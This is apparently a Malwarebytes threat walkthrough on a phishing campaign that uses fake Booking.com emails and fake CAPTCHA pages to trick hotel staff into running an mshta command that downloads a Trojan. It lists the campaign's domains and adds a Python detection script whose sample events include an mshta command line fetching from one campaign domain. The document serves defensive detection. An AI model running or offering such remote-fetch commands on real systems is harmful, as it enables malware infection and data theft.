Fake Booking.com emails target hotels
Pieter Arntz · 2025-04-02 · via Threat Walkthroughs – ThreatDown by Malwarebytes

A new phishing campaign is using a famous brand to compromise hotels.

A new phishing campaign is using the Booking.com brand and fake CAPTCHA websites to target hotels. The attack begins with cybercriminals sending a fake Booking.com email to the hotel’s email address, asking them to confirm a booking.

Fake booking.com confirmation email

If the hotel staff go to the URL in the email, they are greeted by a website with a fake CAPTCHA popup asking them to prove they are a human.

Robot or Human?

Behind the scenes, the website has loaded a malicious mshta command into the user’s clipboard.

When they tick the CAPTCHA checkbox, the target is asked to complete a set of “Verification Steps”.

set of instructions

What the instructions actually do is paste the contents of the clipboard into a Windows command prompt and run it. That executes the mshta command, which fetches and runs a remote file, setting off an attack chain that ends with the hotel’s systems being infected with a Trojan.

A compromised hotel network is a significant prize for cybercriminals, potentially offering access to payment details and other personal data that can be abused or sold.

How ThreatDown can help you

Even staff who have been trained to check that email senders are valid and to avoid links in emails will slip up from time to time, and a range of technologies can blunt the impact when they do.

IOCs

Domains used in this campaign:

  • vencys[.]com, appears in the email and redirects to the CAPTCHA site.
  • bokcentrpart[.]com, hosts the fake CAPTCHA site.
  • captpart[.]info, the site the malware is downloaded from.
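
One way to hunt for the behaviour described above in process-creation logs: flag any mshta launch whose command line carries a remote URL, and raise it to a campaign match when the host is one of the listed domains. This is an added example, not code from the article or from ThreatDown; the event field names, sample paths and sample URLs are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Campaign domains, defanged exactly as the article lists them.
DEFANGED_IOCS = ("vencys[.]com", "bokcentrpart[.]com", "captpart[.]info")
IOC_DOMAINS = {d.replace("[.]", ".") for d in DEFANGED_IOCS}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def remote_hosts(command_line):
    """Lower-cased hostnames of every http(s) URL in a command line."""
    hosts = []
    for url in URL_RE.findall(command_line):
        try:
            host = urlsplit(url).hostname
        except ValueError:  # malformed URL, e.g. unbalanced brackets
            continue
        if host:
            hosts.append(host.rstrip("."))
    return hosts

def is_ioc(host):
    """True for a campaign domain or any subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)

def triage(event):
    """None = ignore, "suspicious" = mshta given a remote URL,
    "campaign" = that URL's host is one of the article's IOC domains."""
    image = event["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image != "mshta.exe":
        return None
    hosts = remote_hosts(event["command_line"])
    if not hosts:
        return None
    return "campaign" if any(is_ioc(h) for h in hosts) else "suspicious"

# Constructed sample events; field names and paths are assumptions.
IOC_HOST = "captpart[.]info".replace("[.]", ".")
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "command_line": f"mshta https://{IOC_HOST}/constructed-path"},
    {"image": r"C:\Windows\System32\MSHTA.EXE",
     "command_line": 'mshta "http://files.example.test/setup.hta"'},
    {"image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta C:\Tools\inventory.hta"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad https://example.test/readme.txt"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev), "<-", ev["command_line"])
```

The "suspicious" tier matters because campaign domains rotate: an mshta process given any remote URL is worth reviewing even when the host is not on the list.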